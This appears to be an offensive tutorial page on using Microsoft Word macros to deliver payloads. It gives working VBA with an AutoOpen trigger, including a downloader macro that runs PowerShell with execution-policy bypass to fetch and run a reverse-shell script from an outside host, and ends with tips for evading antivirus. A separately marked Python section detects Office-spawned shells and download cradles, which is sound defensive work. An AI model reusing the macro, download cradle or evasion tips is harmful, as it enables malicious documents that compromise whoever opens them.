Microsoft Word Macro Payload


Delivering a reverse shell payload through an Office macro is an old technique, but it still works if you can bypass AV.

Get your code ready

Start Microsoft Office 2016 Pro Plus, go to the View tab and click Macros > View Macros.

Give the macro a name, select Document1 in the "Macros in" list and click Create.

Paste the code below and save the file as a Word Macro-Enabled Document or a Word 97-2003 Document:

Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "calc.exe"
exec = Shell(cmd, vbHide)

End Sub

Sub AutoOpen()
    TestMacro
End Sub

Execute

Open the document, click Enable Content, and calc.exe opens!


Simple Downloader

In this way we can execute any command, such as powershell iwr …:

Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "powershell.exe -exec bypass -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/RevShell.ps1')"
exec = Shell(cmd, vbHide)

End Sub

Sub AutoOpen()
    TestMacro
End Sub
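
Seen from the detection side, the macro above makes WINWORD.EXE the parent of powershell.exe, and that relationship is recorded no matter how the command line is written. The following is an added example, not part of the original page: it triages process-creation events for that pattern. The field names follow Sysmon Event ID 1; the process lists, trait names and sample events are assumptions made for illustration.

```python
# Added example (not from the original page): triage Office -> shell process creation.
# Field names follow Sysmon Event ID 1; lists, trait names and events are assumptions.
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPECT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                    "wscript.exe", "cscript.exe", "mshta.exe"}
CMD_TRAITS = {  # command-line traits, checked in this order
    "exec_policy_bypass": re.compile(r"-(ep|ex\w*)\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "inline_eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded_command": re.compile(r"\s-e(nc\w*|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def triage(event):
    """Return (severity, reasons), or None when the event is not Office -> shell."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in SUSPECT_CHILDREN:
        return None
    traits = [n for n, rx in CMD_TRAITS.items() if rx.search(event["CommandLine"])]
    # The parent/child pair alone is worth an alert; traits raise the severity.
    return ("high" if traits else "medium", [f"{parent} -> {child}"] + traits)

WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed samples
    # 0: the command line used by the page's downloader macro
    {"ParentImage": WORD, "Image": PS, "CommandLine":
     "powershell.exe -exec bypass -c iex(new-object net.webclient)"
     ".downloadstring('http://10.10.14.15/RevShell.ps1')"},
    # 1: encoded variant; the blob is a placeholder (base64 of "ABC" repeated)
    {"ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell.exe -nop -enc " + "QUJD" * 10},
    # 2: Word spawning a shell with no further traits
    {"ParentImage": WORD, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ver"},
    # 3: Word's print helper, a normal child process
    {"ParentImage": WORD, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 8192"},
    # 4: interactive PowerShell started from the desktop shell
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        print(i, triage(ev))
```

Events 0 and 1 are rated high and event 2 medium, while the print helper and the interactive PowerShell session return None.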

Tips to bypass AV

  1. Encode/Encrypt the powershell command
  2. Unhook Powershell.exe